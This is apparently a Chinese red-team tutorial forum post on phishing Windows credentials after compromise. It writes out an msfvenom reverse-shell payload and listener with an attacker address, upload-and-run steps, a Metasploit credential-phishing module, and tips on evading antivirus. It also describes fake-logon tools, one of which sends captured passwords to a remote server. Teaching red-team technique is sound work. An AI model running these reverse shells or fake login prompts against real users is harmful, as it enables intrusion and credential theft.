意义:

在红队评估期间,如果获得Windows的用户凭据可以帮助进行横向,在通过一些
抓密码的工具进行内网渗透的时候没有结果的话,使用钓鱼进行攻击也许会获得
需要的账号密码。

攻击过程:

有许多工具可以实现这一效果,基本的过程是:

(1)Payload获得目标机shell
(2)上传钓鱼工具启动
(3)在命令行等待受害用户输入密码

C2:
可以选择的工具有metasploit, cobalt strike, powershell empire等等,
基于免杀性考量,后两者的选择更为合适

cobalt strike:

对于这个工具的学习其实很简单,我把关键词丢进先知社区,
https://xz.aliyun.com/search?keyword=Cobalt+Strike

接下来就是简单的阅读,下载,安装,运行了。
ps模式下的payload更容易绕过大多数杀毒软件


生成payload
Attacks->Packages->...

上传利用工具
execute-assembly /root/Desktop/exp.exe

metasploit

生成payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.12 lport=3333 -f exe >> payload.exe
python -m SimpleHTTPServer 80

上传利用工具
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.12
set lport 3333
run
upload exp.exe
shell
exp.exe

FakeLogonScreen:
https://github.com/bitsadmin/fakelogonscreen/releases
这款工具需要依赖.NET环境,因为是用的C#开发
它会弹出一个假的登录背景,当用户上当并输入密码的时候,
它将针对Active Directory或本地执行验证来确保密码正确,

SharpLocker:
https://github.com/Pickfordmatt/SharpLocker/releases
同样类似的这款工具也是执行后显示伪造的登录界面,
然后捕获击键显示在控制台上,直到密码正确结束

CredsLeaker:
https://github.com/Dviros/CredsLeaker
CredsLeaker这款工具更强的特点是可以把获得的用户名和密码
存储在Web服务器中,它通过Powershell调用HTTP请求,可以从
bat文件直接执行Powershell命令

使用前需要先修改php和ps文件配置,设置存用户密码的配置,
运行后会弹出Windows窗口,只有当输入正确的时候才会消失

然后在设定的路径进行查看

Phish_windows_credentials
msf本身也提供了一个模块:
use post/windows/gather/phish_windows_credentials
set SESSION 3
set PROCESS *
run



当用户输入其账号密码的时候,这些凭据会被捕获显示在控制台

lockphish

https://github.com/thelinuxchoice/lockphish
lockphish是一个自动化的工具,个人认为它比上述所有工具都富有想象力,
它使用Web界面进行远程的社会工程学钓鱼,并且完美规避了免杀的问题,

默认它会重定向到youtube

当受害者点击这个链接的时候,会打开全屏的一个虚假登录框,
部分浏览器会提示请求全屏问题,

它要求的是输入Administrator的密码,
小缺点的是因为在web层面无法进行密码正确的验证,


捕获完成输入以后,会重定向到youtube。

其他相关的利用工具还有:
https://malicious.link/post/2015/powershell-popups-and-capture/
https://github.com/samratashok/nishang/blob/master/Gather/Invoke-CredentialsPhish.ps1
https://github.com/enigma0x3/Invoke-LoginPrompt

参考来源:
https://attack.mitre.org/techniques/T1141/
https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/
https://github.com/enigma0x3/Invoke-LoginPrompt
https://github.com/samratashok/nishang/blob/master/Gather/Invoke-CredentialsPhish.ps1
https://github.com/bitsadmin/fakelogonscreen
https://github.com/Pickfordmatt/SharpLocker
https://malicious.link/post/2015/powershell-popups-and-capture/
https://github.com/Dviros/CredsLeaker
https://github.com/thelinuxchoice/lockphish
https://pentestlab.blog/2020/03/02/phishing-windows-credentials/

用钓鱼攻击Windows凭据.pdf (3.494 MB) 下载附件
点击收藏 | 2 关注 | 2
  • 动动手指,沙发就是你的了!
登录 后跟帖